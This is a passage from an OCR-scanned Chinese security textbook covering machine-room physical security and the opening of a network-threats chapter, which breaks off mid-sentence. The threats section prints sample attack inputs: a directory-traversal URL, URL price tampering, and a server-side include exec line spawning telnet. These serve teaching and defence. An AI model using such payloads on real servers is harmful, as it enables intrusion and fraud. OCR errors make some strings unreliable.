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计算 机 系统 的 技术 复杂 ,电磁 干扰 ,震动 .温度 和 湿度 变化 都 会 影响 计算 机 系统 的 可 
靠 性 、 安 全 性 。 轻 则 造成 工作 不 稳定 ,性 能 降低 ,或 出 现 故障 ; 重 则 会 使 零 部 件 寿 命 缩 短 ， 
甚至 是 损坏 。 为 了 使 计算 机 能 够 长 期 稳定 、 可 靠 、 安 全 地 工作 ,应 该 选择 合适 的 场地 
环境 。 

(1) 机 房 安全 要 求 。 计 算 机 机 房 应 尽量 建立 在 远离 生产 或 存储 具有 腐蚀 性 、 易 燃 易 
爆 物 品 的 场所 周围 ;尽量 避 开 污染 区 ,以 及 容易 产生 粉尘 .油烟 和 有 毒气 体 的 区 域 ,以 及 雷 
区 等 。 

机 房 应 选用 专用 的 建筑 物 ,在 建筑 设计 时 考虑 其 结构 安全 。 若 机 房 设 在 办 公 大 楼 内 ， 
则 最 好 不 要 安排 在 底层 或 顶层 ,这 是 因为 底层 一 般 较 潮湿 ,而 顶层 有 漏 雨 、 穿 窗 而 人 的 危 
险 。 在 较 大 的 楼 层 内 ,计算 机 机 房 应 靠近 楼 梯 的 一 边 。 

此 外 ,如 何 减 少 无 关 人 员 进 入 机 房 的 机 会 也 是 计算 机 机 房 设 计时 首要 考虑 的 问题 。 

(2) 机 房 防 盗 要 求 。 视 频 监 视 系 统 是 一 种 较为 可 靠 的 防盗 设备 ,能 对 计算 机 网 络 系 
统 的 外 围 环境 、 操 作 环 境 进 行 实时 全 程 监控 。 对 重要 的 机 房 ,还 应 采取 特别 的 防盗 措施 ， 
如 值班 守卫 、 出 入 口 安装 金属 探测 装置 等 。 
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(3) 机 房 三 度 要 求 。 温 度 、 湿 度 和 洁净 度 并 称 为 三 度 ,为 保证 计算 机 网 络 系 统 的 正常 
运行 ,对 机 房 内 的 三 度 都 有 明确 的 要 求 。 为 使 机 房 内 的 三 度 达到 规定 的 要 求 ,空调 系统 、 
去 湿 机 、 除 侍 器 是 必 不 可 少 的 设备 。 重 要 的 计算 机 系统 安放 处 还 应 配备 专用 的 空调 系统 ， 
它 比 公用 的 空调 系统 在 加 湿 ,除尘 等 方面 有 更 高 的 要 求 。 

。 温 度 : 机 房 温度 一 般 应 控制 在 18 一 22C 。 

。 湿度 : 相对 湿度 一 般 控制 在 40% 一 60% 为 宜 。 

。 洁净 度 : 尘埃 颗粒 直径 二 0. 5ym, 含 尘 量 二 1 万 颗 / 升 。 

(4) 防水 与 防火 要 求 。 计 算 机 机 房 的 火灾 一 般 是 由 电气 原因 (电路 破损 、 短 路 、 超 负 
荷 )、 人 为 事故 (吸烟 ,防火 ,接线 错误 ) 或 外 部 火灾 蔓延 引起 的 。 计 算 机 机 房 的 水 灾 一 般 是 
由 机 房 内 有 渗水 ,漏水 等 原因 引起 的 。 

为 避免 火灾 ,水 灾 ,应 采取 如 下 具体 措施 : 

。 隔离 。 

。 设置 紧急 断 电 装置 。 

。 设置 火灾 报警 系统 。 

， 配备 灭火 设施 。 

*。 加 强 防 水 、 防 火 管理 和 操作 规范 。 例 如 : 计算 机 中 心 应 严禁 存放 腐蚀 性 物品 和 易 

燃 易 爆 物品 ,禁止 吸烟 和 随意 动 火 ,检修 时 必须 先 关闭 设备 电源 再 进行 作业 等 。 
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(1) 设备 的 使 用 管理 。 要 根据 硬件 设备 的 具体 配置 情况 ,制定 切实 可 行 的 硬件 设备 
操作 使 用 规程 ,并 严格 按 操 作 规程 进行 操作 。 建 立 设备 使 用 情况 日 志 , 并 严格 登记 使 用 过 
程 的 情况 。 建 立 硬件 设备 故障 情况 登记 表 , 详 细 记 录 故 障 性 质 和 修复 情况 。 坚 持 对 设备 
进行 例 行 维护 和 保养 ,并 指定 专人 负责 。 

(2) 设备 的 维护 与 保养 。 定 期 检查 供电 系统 的 各 种 保护 装置 及 地 线 是 否 正常 。 对 设 
备 的 物理 访问 权限 限制 在 最 小 范围 内 。 

(3) 防盗。 在 需要 保护 的 重要 设备 .存储 媒体 和 硬件 上 贴 上 特殊 标签 (如 磁性 标签 ) , 
当 有 人 非法 携带 这 些 重要 设备 或 物品 外 出 时 ,检测 器 就 会 发 出 报警 信号 。 将 每 台 重要 的 
设备 通过 光纤 电缆 串 接 起 来 ,并 使 光束 沿 光纤 传输 ,如 果 光 束 传输 受阻 , 则 自动 报警 。 

(4) 供电 系统 安全 。 电 源 是 计算 机 网 络 系统 的 命脉 ,电源 系统 的 稳定 可 靠 是 计算 机 
网 络 系统 正常 运行 的 先决 条 件 。 电 源 系 统 电压 的 波动 `. 浪 涌 电 流 和 突然 断 电 等 意外 情况 
的 发 生还 可 能 引起 计算 机 系统 存储 信息 的 丢失 存储 设备 的 损坏 等 情况 的 发 生 ,电源 系统 
的 安全 是 计算 机 系统 物理 安全 的 一 个 重要 组 成 部 分 。 

GB/T 2887 一 2000 将 供电 方式 分 为 三 类 : 一 类 供电 ,需要 建立 不 间断 供电 系统 ;二 类 
供电 ,需要 建立 带 备用 的 供电 系统 ;三 类 供电 , 按 一 般 用 户 供电 考虑 。 

(5) 防 静 电 。 不 同 物体 间 的 相互 摩擦 、 接 触 会 产生 能 量 不 大 但 电压 非常 高 的 静电 。 
如 果 静 电 不 能 及 时 释放 ,就 可 能 产生 火花 ,容易 造成 火灾 或 损坏 芯片 等 意外 事故 。 计 算 机 
系统 的 CPU、ROM、RAM 等 关键 部 件 大 都 采用 MOS 工艺 的 大 规模 集成 电路 ,对 静电 极 
为 敏感 ,容易 因 静 电 而 损坏 。 
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机 房 的 内 装修 材料 一 般 应 避免 使 用 挂 毯 、. 地 毯 等 吸 侍 、 容 易 产 生 苦 电 的 材料 ,而 应 采 
用 乙烯 材料 。 为 了 防 静电 ,机 房 一 般 要 安装 防 静电 地 板 。 机 房 内 应 保持 一 定 湿 度 ,特别 是 
在 干燥 季节 应 适当 增加 空气 湿度 ,以 免 因 干燥 而 产生 静电 。 

(6) 防 雷 击 。 接 地 与 防 雷 是 保护 计算 机 网 络 系统 和 工作 场所 安全 的 重要 措施 。 接 地 
是 指 整 个 计算 机 系统 中 各 处 电位 均 以 大 地 电位 为 零 参 考 电 位 。 接 地 可 以 为 计算 机 系统 的 
数字 电路 提供 一 个 稳定 的 0V 参考 电位 ,从 而 可 以 保证 设备 和 人 身 的 安全 ,同时 也 是 防止 
电磁 信息 泄漏 的 有 效 手段 。 

要 求 良好 接地 的 设备 有 : 各 种 计算 机 外 围 设备 多 相位 变压器 的 中 性 线 、. 电 缆 外 套 
管 . 电 子 报警 系 统 、 隔 离 变压器 .电源 和 信号 滤波 器 、 通 信 设 备 等 。 
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计算 机 网 络 系统 的 数据 要 存储 在 某 种 媒体 上 ,常用 的 存储 媒体 有 : 硬盘 、 磁 盘 、 磁 带 、 
打印 纸 .光盘 等 。 

(1) 存放 有 业务 数据 或 程序 的 磁盘 、 磁 带 或 光盘 ,必须 注意 防磁 、 防 潮 、 防 火 、 防 盗 。 

(2) 对 硬盘 上 的 数据 ,要 建立 有 效 的 级 别 、 权 限 ,并 严格 管理 ,必要 时 要 对 数据 进行 加 
密 , 以 确保 硬盘 数据 的 安全 。 

(3) 存放 业务 数据 或 程序 的 磁盘 、 磁 带 或 光盘 ,管理 必须 落实 到 人 ,并 分 类 建立 登 
记 德 。 

(4) 对 存放 有 重要 信息 的 磁盘 、 磁 带 、 光 盘 . 要 备份 两 份 并 分 两 处 保管 。 

(5) 打印 有 业务 数据 或 程序 的 打印 纸 , 要 视 同 档案 进行 管理 。 

(6) 凡 超 过 数据 保存 期 的 磁盘 、 磁 带 、 光 盘 , 必 须 经 过 特殊 的 数据 清除 处 理 , 视 同 空白 
磁盘 、 磁 带 、 光 盘 。 

(7) 凡 不 能 正常 记录 数据 的 磁盘 、 磁 带 、 光 盘 , 必 须 经 过 测试 确认 后 销毁 。 

(8) 对 需要 长 期 保存 的 有 效 数据 ,应 在 磁盘 、 磁 带 、 光 盘 的 质量 保证 期 内 进行 转 储 , 转 
储 时 应 确保 内 容 正 确 。 
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《信息 安全 技术 信息 系统 物理 安全 技术 要 求 )(GB/T 21052 一 2007) 将 物理 安全 技术 
等 级 分 为 五 个 不 同 级 别 。 

第 二 级 物理 安全 技术 要 求 中 设立 了 “人 员 要 求 ”: 要 求 建立 正式 的 安全 管理 组 织 机 
构 ,委任 并 授权 安全 管理 机 构 负 责 人 负责 安全 管理 的 权力 ,负责 安全 管理 工作 的 组 织 和 
实施 。 

第 三 级 物理 安全 技术 要 求 中 规定 了 “人 员 与 职责 要 求 ” 在 满足 第 二 级 要 求 的 基础 
上 ,要 求 对 信息 系统 物理 安全 风险 控制 .管理 过 程 的 安全 事务 明确 分 工 责任 。 对 系统 物理 
安全 风险 分 析 与 评估 ,安全 策略 的 制定 、 安 全 技术 和 管理 的 实施 、 安 全 意识 培养 与 教育 、 安 
全 事件 和 事故 响应 等 工作 应 制定 管理 负责 人 ,制定 明确 的 职责 和 权力 范围 。 编 制 工作 岗 
位 和 职责 的 正式 文件 ,明确 各 个 岗位 的 职责 和 技能 要 求 。 对 不 同 岗位 制定 和 实施 不 同 的 
安全 培训 计划 ,并 对 安全 培训 计划 进行 定期 修改 。 对 信息 系统 的 工作 人 员 ,资源 实施 等 级 
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标记 管理 制度 。 对 安全 区 域 实施 分 级 标记 管理 ,对 出 入 安全 区 域 的 工作 人 员 应 验证 标记 ， 
安全 标记 不 相符 的 人 员 不 得 入 内 。 对 安全 区 域内 的 活动 进行 监视 和 记录 ,所 有 物理 设施 
应 设置 安全 标记 。 

第 四 级 物理 安全 技术 要 求 中 规定 了 “人 员 与 职责 要 求 ”; 在 满足 第 三 级 要 求 的 基础 
上 ,要 求 安全 管理 渗透 到 计算 机 信息 系统 各 级 应 用 部 门 ,对 物理 安全 管理 活动 实施 质量 控 
制 ,建立 质量 管理 体系 文件 。 要 求 独立 的 评估 机 构 对 使 用 的 安全 管理 职责 体系 .计算 机 信 
息 系统 物理 安全 风险 控制 ,管理 过 程 的 有 效 性 进行 评审 ,保证 安全 管理 工作 的 有 效 性 。 对 
不 同安 全 区 域 实施 隔离 ,建立 出 入 审查 、 登 记 管理 制度 ,保证 出 入 得 到 明确 授权 。 对 标记 
安全 区 域内 的 活动 进行 不 间断 实时 监视 记录 。 建 立 出 入 安全 检查 制度 ,保证 出 入 人 员 没 
有 携带 危及 信息 系统 物理 安全 的 物品 。 

第 五 级 物理 安全 技术 要 求 在 标准 中 未 进行 描述 。 


6.4 本 章 小 结 


物理 安全 在 整个 计算 机 网 络 信息 系统 安全 体系 中 占有 重要 地 位 。 物 理 安全 涉及 计算 
机 设备 、 设 施 \ 环 境 、 人 员 等 整个 系统 应 当 采 取 的 安全 措施 ,确保 信息 系统 安全 可 靠 运 行 ， 
防止 人 为 或 自然 因素 的 危害 而 使 信息 丢失 ,泄露 或 破坏 。 本 章 首 先 对 物理 安全 的 内 涵 , 主 
要 威胁 、 主 要 技术 及 相关 标准 进行 了 概述 ;然后 对 物理 访问 控制 技术 、 生 物 识别 技术 、 检 测 
和 监控 技术 ,物理 隔离 技术 、 防 信息 泄露 技术 等 进行 了 详细 介绍 ;最 后 ,对 物理 安全 管理 所 
涉及 的 环境 安全 管理 ,设备 安全 管理 数据 安全 管理 .人 员 安 全 管理 等 内 容 进 行 了 曾 述 。 
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. 物理 安全 在 计算 机 信息 系统 安全 中 的 意义 是 什么 ? 
. 物理 安全 主要 包含 哪些 方面 的 内 容 ? 


. 生物 识别 系统 常见 的 实现 方式 和 实现 过 程 是 怎样 的 ? 
. 物理 隔离 与 逻辑 隔离 的 区 别 是 什么 ? 
. 防止 电磁 泄漏 的 主要 途径 有 哪些 ? 
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本 章 学 习 要 点 : 

所 了 解 网 络 所 面临 的 安全 威胁 ; 

如 掌握 防止 网 络 攻击 的 控制 措施 ; 

名 了 解 防火 墙 的 体系 结构 、 类 型 .能 力 和 限制 ,掌握 防火 墙 的 基本 工作 原理 ; 
名 了 解 入 侵 检 测 系 统 的 功能 及 类 型 ; 

名 了 解 虚拟 专 有 网 的 类 型 和 协议 ; 

如 了 解 移动 通信 网 络 安全 和 无 线 局 域 网 安全 。 


网 络 安全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 ,涉及 的 领域 相当 广泛 ,这 是 因为 
在 目前 的 公用 通信 网络 中 存在 着 各 种 各 样 的 安全 漏洞 和 威胁 。 凡 是 涉及 网 络 上 信息 
的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 和 理论 ,都 是 网 络 安全 所 要 研 
究 的 领域 。 严 格 地 说 ,网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 保 
护 ,不 受 偶然 的 或 者 恶意 的 原因 而 遭 到 破坏 、 更 改 、 汇 露 , 系 统 连续 可 靠 正常 地 运行 ,网 
络 服务 不 中 断 。 


7.1 网 络 安全 威胁 与 控制 
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1. 威胁 分 类 

网 络 所 面临 的 安全 威胁 大 体 可 分 为 两 种 : 一 是 对 网 络 本 身 的 威胁 ,二 是 对 网 络 中 信 
息 的 威胁 。 对 网 络 本 身 的 威胁 包括 对 网 络 设备 和 网 络 软件 系统 平台 的 威胁 ;对 网 络 中 信 
息 的 威胁 除了 包括 对 网 络 中 数据 的 威胁 外 ,还 包括 对 处 理 这 些 数 据 的 信息 系统 应 用 软件 
的 威胁 。 

这 些 威胁 主要 来 自 人 为 的 无 意 失 误 、 人 为 的 恶意 攻击 、 网 络 软 件 系 统 的 漏洞 和 “后 门 ” 
三 个 方面 的 因素 。 

(1) 人 为 的 无 意 失误 是 造成 网 络 不 安全 的 重要 原因 。 网 络 管理 员 在 这 方面 不 但 肩负 
重任 ,还 面临 越 来 越 大 的 压力 。 稍 有 考虑 不 周 ,安全 配置 不 当 , 就 会 造成 安全 漏洞 。 另 外 ， 
用 户 安全 意识 不 强 , 不 按照 安全 规定 操作 ,如 口令 选择 不 慎 , 将 自己 的 账户 随意 转借 他 人 
或 与 别人 共享 ,都 会 对 网 络 安全 带 来 威胁 。 
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(2) 人 为 的 恶意 攻击 是 目前 计算 机 网 络 所 面临 的 最 大 威胁 。 人 为 攻击 又 可 以 分 为 两 
类 : 一 类 是 主动 攻击 , 它 以 各 种 方式 有 选择 地 破坏 系统 和 数据 的 有 效 性 和 完整 性 ; 另 一 类 
是 被 动 攻击 , 它 是 在 不 影响 网 络 和 应 用 系统 正常 运行 的 情况 下 ,进行 截获 窃取 、 破 译 , 以 
获得 重要 机 密 信息 。 这 两 种 攻击 均 可 对 计算 机 网 络 造 成 极 大 的 危害 ,导致 网 络 瘫痪 或 机 
密 泄 露 。 

(3) 网 络 软 件 系 统 不 可 能 百分之百 无 缺陷 和 无 漏洞 。 另 外 ,许多 软件 都 存在 设计 编 
程 人 员 为 了 方便 而 设置 的 “后 门 ”。 这 些 漏洞 和 “后 门 ” 恰 恰 是 黑客 进行 攻击 的 首选 目标 。 

多 数 安全 威胁 都 具有 相同 的 特征 , 即 威胁 的 目标 都 是 破坏 机 密 性 、 完 整 性 或 者 可 用 
性 ;威胁 的 对 象 包 括 数据 .软件 和 硬件 ;实施 者 包括 自然 现象 .偶然 事件 .无 恶意 的 用 户 和 
恶意 攻击 者 。 

2. 对 网 络 本 身 的 威胁 

1) 协议 的 缺陷 

网 络 协议 是 网 络 的 基础 ,协议 的 缺陷 是 网 络 安全 威胁 的 根源 之 一 。 互 联网 联盟 为 了 
详细 检查 所 有 因特网 协议 ,而 将 它们 公开 张贴 出 来 。 每 一 种 被 接受 的 协议 都 被 分 配 了 一 
个 Internet(Request For Comment,RFC) 标 准 (草案 ) 编 号 。 在 协议 被 接受 成 为 一 个 标准 
之 前 ,许多 协议 中 存在 的 问题 就 已 经 被 那些 敏锐 的 检查 者 发 现 并 得 到 了 校正 。 

但 是 ,协议 的 定义 是 由 人 制定 和 审核 的 ,协议 本 身 可 能 是 不 完整 的 ,也 难免 存在 某 些 
缺陷 。 某 些 网 络 协议 的 实现 是 很 多 安全 缺陷 的 源头 ,攻击 者 可 以 利用 这 些 错 误 。 特 别 是 
下 述 软 件 的 故障 : SNMP (网络 管理 ), DNS( 寻 址 服务 ) 和 E-mail 服务 (如 SMTP 和 
S/MIME) .虽然 不 同 的 厂商 会 编写 实现 他 们 自己 服务 的 代码 ,但 他 们 常常 基于 通用 (有 缺 
陷 ) 的 原型 。 这 样 ,在 Windows 上 成 功 的 交互 ,有 可 能 在 UNIX 上 失效 。 例 如 ,针对 
SNMP 缺陷 (漏洞 代码 : 107186) ,CERT 报告 列 出 了 建议 使 用 的 近 200 套 不 同 的 实现 
方案 。 

2) 网 站 漏洞 

因为 网 络 几 乎 完全 暴露 在 用 户 面 前 ,所 以 非常 脆弱 。 如 果 你 使 用 应 用 程序 ,不 会 获取 
并 查看 程序 代码 。 对 于 网 站 来 说 ,攻击 者 能 下 载 网 站 代码 ,再 离线 长 时 间 研 究 它 。 对 于 程 
序 而 言 ,几乎 不 能 控制 使 用 哪 种 顺序 访问 程序 的 不 同 部 分 ,但 是 ,网 站 攻击 者 可 以 控制 以 
哪 种 顺序 访问 网 页 ,甚至 直接 访问 网 页 5, 而 不 按 1 到 4 的 顺序 访问 。 攻 击 者 也 能 选择 提 
供 哪 种 数据 ,以 及 用 不 同 的 数据 进行 实验 ,以 测试 网 站 的 反应 。 简 而 言 之 ,攻击 者 在 挑战 
控制 权 方面 具有 优势 。 

(1) 网 站 被 “ 黑 ”。 一 种 最 广为人知 的 攻击 方式 是 网 站 被 “ 黑 ” 式 攻击 。 这 不 仅 是 因为 
其 结果 是 可 见 的 ,而 且 实 施 起 来 也 比较 容易 。 由 于 网 站 的 设计 使 得 代码 可 以 下 载 ,这 就 允 
许 攻 击 者 能 够 获取 全 部 超 文 本 文档 和 在 加 载 进程 中 与 客户 相关 的 所 有 程序 。 攻 击 者 甚至 
可 以 看 到 编程 者 在 创建 或 者 维护 代码 时 遗留 下 来 的 注释 。 下 载 进程 实质 上 为 攻击 者 提供 
了 一 份 该 网 站 的 规划 图 。 

(2) 缓冲 区 溢出 。 网 页 也 存在 缓冲 区 溢出 问题 。 攻 击 者 向 一 个 程序 中 输入 大 量 数 
据 , 比 预期 所 要 接收 的 数据 多 得 多 。 由 于 缓冲 区 的 大 小 是 有 限 的 ,所 以 过 剩 的 数据 就 会 洲 
出 到 相 邻 的 代码 和 数据 区 域 中 去 。 
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最 知名 的 网 页 服务 器 缓冲 区 溢出 也 许 就 是 称 为 iishack 的 文件 名 问题 了 。 这 种 攻击 
方式 如 此 著名 ,以 至 于 被 写 进 了 一 个 程序 中 (参见 http://www. technotronic. com)。 只 
需 提供 要 攻击 的 站 点 和 攻击 者 想 要 服务 器 执行 的 程序 的 URL 作为 参数 ,攻击 者 就 可 以 
执行 该 程序 实施 攻击 。 

其 他 网 页 服务 器 对 于 极 长 的 参数 字段 也 很 容易 发 生 缓冲 区 溢出 错误 ,比如 长 度 为 
10 000 的 口令 或 者 填充 大 量 空格 或 空 字符 的 长 URL。 

(3)“../” 问 题 。 网 页 服务 器 代码 应 该 一 直 在 一 个 受到 限制 的 环境 中 运行 。 在 理想 
情况 下 ,网 页 服务 器 上 应 该 没有 编辑 器 、xterm 和 Telnet 程序 ,其 至 连 绝 大 多 数 系统 应 用 
程序 都 不 应 该 安装 。 通 过 这 种 方式 限制 了 网 页 服务 器 的 运行 环境 以 后 ,即使 攻击 者 从 网 
页 服务 器 的 应 用 程序 区 跳 到 了 别处 ,也 没有 其 他 可 执行 程序 可 以 帮助 攻击 者 使 用 网 页 服 
务 器 所 在 的 计算 机 和 操作 系统 来 扩大 攻击 的 范围 。 用 于 网 页 应 用 程序 的 代码 和 数据 可 以 
采用 手工 方式 传送 到 网 页 服务 器 。 但 是 ,相当 多 的 应 用 软件 程序 员 却 喜欢 在 存放 网 页 应 
用 程序 的 地 方 编辑 它 , 因 此 ,认为 有 必要 保留 编辑 器 和 系统 应 用 程序 ,为 他 们 提供 一 个 完 
整 的 开发 环境 。 

第 二 种 阻止 攻击 的 方法 是 创建 一 个 界 地 址 来 限制 网 页 服务 器 应 用 程序 的 执行 区 域 。 
有 了 这 样 一 个 界 地 址 ,服务 器 应 用 程序 就 不 能 从 它 的 工作 区 域 中 跳出 来 访问 其 他 具有 潜 
在 危险 的 系统 区 域 (比如 编辑 器 和 系统 应 用 程序 ) 了 。 服 务 器 把 一 个 特定 的 子 目 录 作为 根 
目录 ,服务 器 需要 的 所 有 东西 都 放 在 以 此 根 目 录 开 始 的 同一 个 子 树 中 。 

无 论 是 在 UNIX 还 是 在 Windows 操作 系统 中 ,“.. ”都 代表 某 一 个 目录 的 父 目录 。 依 
次 类 推 ,“../.. ”就 是 当前 位 置 的 祖父 目录 。 因 此 ,可 以 输入 文件 名 的 人 每 输入 一 次 *..” 
就 可 以 进入 到 目录 树 的 上 一 层 目 录 。Cerberus Information Security 的 分 析 家 们 发 现 微 
软 索 引 服务 器 的 扩展 文件 webhits. dll 中 就 存在 这 个 漏洞 。 例 如 ,传递 一 个 如 下 的 URL 
会 导致 服务 器 返回 请 求 的 autoexec. nt 文件 ,从 而 允许 攻击 者 修改 或 者 删除 它 : 


http://yoursite.cavV/webhits.htw?ciwebhitsgfile= ../../../../../winnt/system32/autoexec.nt 


(4) 应 用 代码 错误 。 用 户 的 浏览 器 与 网 页 服务 器 之 间 传 递 着 一 种 复杂 而 且 无 状态 的 
协议 交换 。 网 页 服务 器 为 了 使 自己 的 工作 更 轻松 一 些 , 向 用 户 传递 一 些 上 下 文字 符 串 ,而 
要 求 用 户 浏览 器 用 全 部 上 下 文 进行 应 答 。 一 旦 用 户 可 以 修改 这 种 上 下 文 内 容 , 就 会 出 现 
问题 。 

下 面 用 一 个 假想 的 销售 站 点 来 说 明 这 个 问题 。 用 CDs-R-Us 来 称呼 该 站 点 , 它 出 售 
CD。 在 某 一 个 特定 时 刻 , 该 站 点 的 服务 器 可 能 有 一 千 甚 至 更 多 个 交易 正 处 于 不 同 的 状 
态 。 该 站 点 显示 了 供 订购 的 货物 清单 网 页 ,用 户 选 择 其 中 的 一 种 货物 ,站 点 又 显示 出 更 多 
的 货物 ,用 户 又 选择 其 中 的 几 种 ,如 此 进行 下 去 ,直到 用 户 结束 选择 为 止 。 然 后 ,很 多 人 会 
通过 指定 付 账 和 填 入 邮购 信息 继续 完成 这 份 订单 ,但 也 有 一 些 人 使 用 像 这 样 的 网 站 作为 
在 线 目录 或 者 指南 ,而 没有 实际 订购 货物 的 意图 。 比 如 ,他 们 想 使 用 该 站 点 来 查询 
Cherish the Ladies 最 近 出 版 CD 的 价格 ;也 可 能 使 用 在 线 书籍 服务 来 确定 有 多 少 Iris 
Murdoch 编写 的 书 正在 销售 。 或 者 ,即使 用 户 确实 有 购物 的 诚意 ,有 了 时 也 会 由 于 网 页 连 
接 失败 而 留 下 一 个 不 完整 的 交易 。 正 是 考虑 到 这 些 因素 ,网 页 服务 器 常常 通过 一 些 紧 跟 
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在 URL 之 后 的 参数 字段 来 跟踪 一 个 还 没有 完成 的 订单 的 当前 状态 。 随 着 每 一 个 用 户 的 
选择 或 者 页 面 请 求 操作 ,这 些 字段 从 服务 器 传递 到 浏览 器 ,然后 又 返回 给 服务 器 。 

假设 你 已 经 选择 了 一 张 CD, 正 在 查看 第 二 个 网 页 。 网 页 服务 器 已 经 传递 给 你 一 个 
与 此 类 似 的 URL: 


http:/Aww.CDs- r- us.oom/buy.asp?il= 459012gpl= 1599 


该 URL 意味 着 你 已 经 选择 了 一 张 编号 为 459012 的 CD, 单 价 是 15. 99 美元 。 现 在 ， 
你 选择 了 第 二 张 CD, 而 URL 变 成 了 : 


http://wwmw.CDs- r- us.om/buy. asp? il= 459012gpl= 1599&i2- 365217gp2= 1499 


如 果 你 是 一 位 高 明 的 攻击 者 ,就 会 知道 在 用 户 浏览 器 的 地 址 窗口 中 的 URL 是 可 以 
编辑 的 。 结 果 ,将 其 中 的 1599 和 1499 都 改 成 了 199。 这 样 , 当 服务 器 汇总 你 的 订单 时 ， 
瞧 , 你 的 两 张 CD 的 单价 都 只 有 1. 99 美元 了 ! 

在 第 一 次 需要 显示 价格 的 时 候 , 服 务 器 会 设置 (检查 ) 每 一 项 物品 的 价格 。 但 后 来 ,被 
检查 过 的 数据 项 失去 了 控制 ,而 没有 对 它们 进行 复核 。 这 种 情况 经 常 出 现在 服务 器 应 用 
程序 代码 中 ,因为 应 用 程序 编程 人 员 常 常 没 有 意识 到 其 中 存在 的 安全 问题 ,以 至 于 常常 对 
一 些 恶 意 的 举动 没有 预见 性 。 

(5) 服务 器 端 包含 。 一 种 具有 代表 性 的 更 严重 问题 称 为 服务 器 端 包含 (Server-Side 
Include) 问 题 。 该 问题 利用 了 一 个 事实 : 网 页 中 可 以 自动 调用 一 个 特定 的 函数 。 例 如 ,很 
多 页 面 的 最 后 都 显示 了 一 个 “请 与 我 联系 ”链接 ,并 使 用 一 些 Web 命令 来 发 送 电 子 邮 件 消 
息 。 这 些 命令 (比如 E-mail,if, goto 和 include 等 ) 都 被 置 于 某 一 个 区 域 , 以便 转 换 成 
HTML 语言 。 

其 中 一 种 服务 器 端 包含 命令 称 为 exec, 用 于 执行 任意 一 个 存放 于 服务 器 上 的 文件 。 
例如 ,以 下 服务 器 端 包含 命令 : 


< !- #exec a "/usr/bin/telnet &"- > 


会 以 服务 器 的 名 义 ( 也 就 是 说 ,具有 服务 器 的 特权 ) 打 开 一 个 在 服务 器 上 运行 的 Telnet 会 
话 。 攻 击 者 会 对 执行 像 chmod( 改 变 一 个 对 象 的 访问 权限 ) ,sh( 建 立 一 个 命令 行 解释 器 ) 
或 者 cat( 复 制 到 一 个 文件 ) 这 样 的 命令 很 感 兴趣 。 

3) 拒绝 服务 

可 用 性 攻击 ,有 时 称 为 拒绝 服务 或 者 DoS 攻击 ,在 网 络 中 比 在 其 他 的 环境 中 更 加 值 
得 重视 。 可 用 性 或 持续 服务 面临 着 很 多 意外 或 者 恶意 的 威胁 。 

(1) 传输 故障 。 有 很 多 原因 会 导致 通信 故障 。 比 如 ,电话 线 被 切断 ;网 络 噪声 使 得 一 
个 数据 包 不 能 被 识别 或 者 不 能 被 投递 ;传输 路 径 上 的 一 台 设 备 出 现 软件 或 者 硬件 故障 ;一 
台 设 备 因 维修 或 者 测试 而 停止 服务 ; 某 台 设备 被 太 多 任务 所 淹没 ,从 而 拒绝 接收 其 他 输入 
数据 ,直到 所 有 过 载 数据 被 清除 为 止 。 在 一 个 主干 网 络 (包括 因特网 ) 中 ,其 中 的 许多 问题 
都 是 临时 出 现 或 者 能 够 自动 恢复 (通过 绕道 的 方式 ) 的 。 

然而 ,一 些 故 障 却 很 不 容易 修复 。 比 如 ,连接 到 你 使 用 的 计算 机 的 唯一 一 根 通信 线路 
(例如 ,从 网 络 到 你 的 网 卡 或 者 连 到 你 的 Modem 上 去 的 电话 线 ) 被 折断 了 ,就 只 能 通过 另 
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外 接 一 根 线 或 者 修理 那 根 被 损坏 的 线 来 进行 恢复 。 网 络 管理 员 会 说 “这 对 网 络 的 其 他 部 
分 不 会 造成 影响 ”, 但 对 你 而 言 , 这 句 话 起 不 到 任何 安慰 作用 。 

站 在 一 个 恶意 的 立场 来 看 ,所 有 可 以 切断 线路 .干扰 网 络 或 者 能 使 网 络 过 载 的 人 都 可 
以 造成 你 得 不 到 服务 。 来 自 物 理 上 的 威胁 是 相当 明显 的 。 下 面 来 介绍 一 些 可 以 导致 拒绝 
服务 的 电子 攻击 类 型 。 

(2) 连接 洪 泛 。 最 早出 现 的 拒绝 服务 攻击 方式 是 使 连接 出 现 泛滥 。 如 果 一 名 攻击 者 
给 你 发 送 了 太 多 数据 ,以 至 于 你 的 通信 系统 疲 于 应 付 ,这 样 , 就 没 空 接收 任何 其 他 数据 了 。 
即使 偶尔 有 一 两 个 来 自 其 他 人 的 数据 包 被 你 收 到 ,你 们 之 间 的 通信 质量 也 会 出 现 严重 
降级 。 

一 些 更 为 狭 独 的 攻击 方式 使 用 了 因特网 协议 中 的 元 素 。 除 了 TCP 和 UDP 协议 以 
外 ,因特网 协议 中 还 有 一 类 协议 , 称 为 网 际 控 制 报 文 协议 (Internet Control Message 
Protocol,ICMP) ,通常 用 于 系统 诊断 。 这 些 协议 与 用 户 应 用 软件 没有 联系 。ICMP 协议 
包括 : 

。 Ping: 用 于 要 求 某 个 目标 返回 一 个 应 答 , 目 的 是 看 目标 系统 是 否 可 以 到 达 以 及 是 
否 运转 正常 。 
Echo: 用 于 请 求 一 个 目标 将 发 送 给 它 的 数据 发 送 回来 ,目的 是 看 连接 链 路 是 否 可 
靠 (Ping 实际 上 是 Echo 的 一 个 特殊 应 用 ) 。 
Destination Unreachable: 用 于 指出 一 个 目标 地 址 不 能 被 访问 。 
Source Quench: 意味 着 目标 即将 达到 处 理 极限 ,数据 包 的 发 送 端 应 该 在 一 段 时 间 
内 暂停 发 送 数据 包 。 

这 些 协 议 对 于 网 络 管理 有 重要 的 作用 。 但 是 ,它们 也 可 能 用 于 对 系统 的 攻击 。 由 于 
这 些 协议 都 是 在 网 络 堆栈 中 进行 处 理 的 ,因而 在 接收 主机 端 检 测 或 者 阻塞 这 种 攻击 是 很 
困难 的 。 下 面 来 看 看 怎样 使 用 其 中 的 两 种 协议 来 攻击 一 名 受害 者 。 

Q@ 响应 索取 。 这 种 攻击 发 生 在 两 台 主 机 之 间 。chargen 是 一 个 用 于 产生 一 串 数 据 包 
的 协议 ,常常 用 于 测试 网 络 的 容量 。 攻 击 者 在 主机 A 上 建立 起 一 个 chargen 进程 ,以 产生 
一 串 包 ,作为 对 目标 主机 B 的 响应 包 。 然 后 ,主机 A 生成 一 串 包 发 送 给 主机 B, 主 机 B 通 
